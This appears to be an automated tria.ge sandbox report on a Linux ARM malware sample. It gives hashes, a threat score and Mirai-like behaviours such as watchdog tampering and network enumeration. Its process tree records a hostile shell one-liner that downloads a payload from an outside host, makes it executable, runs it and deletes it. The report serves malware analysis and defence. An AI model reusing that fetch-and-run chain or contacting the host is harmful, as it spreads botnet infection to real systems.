Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
140s -
platform
debian-9_armhf -
resource
debian9-armhf-20231215-en -
resource tags
-
submitted
19/02/2024, 09:49
General
-
Target
4d21edf2f074bb83a118e4321c912922.elf
-
Size
127KB
-
MD5
4d21edf2f074bb83a118e4321c912922
-
SHA1
7816908c6cf7c4c105338a097a84578602396f7b
-
SHA256
19936aea14ea5d32bf54625c3a2e6d735e24b866ff33f76d3d654620ecb2f0fa
-
SHA512
1da50741de1b474fa6e77cfc488976f9558650a4ff0be7a089dfb86138daabfa89f97b786b842418049b8a26ed95fbf7b52c04543c736939656d898d7590335a
-
SSDEEP
3072:+DShVLkDZ6waCAdclEbYJOmP46aQyfPluesNb:VhVeZ6zclEboOmP46aQyfPluesNb
Score
7/10
Malware Config
Signatures
-
Changes its process name 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/4d21edf2f074bb83a118e4321c912922.elf/tmp/4d21edf2f074bb83a118e4321c912922.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 .....3⤵
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./.....3⤵
-
-
/bin/rmrm -rf .....3⤵
-
-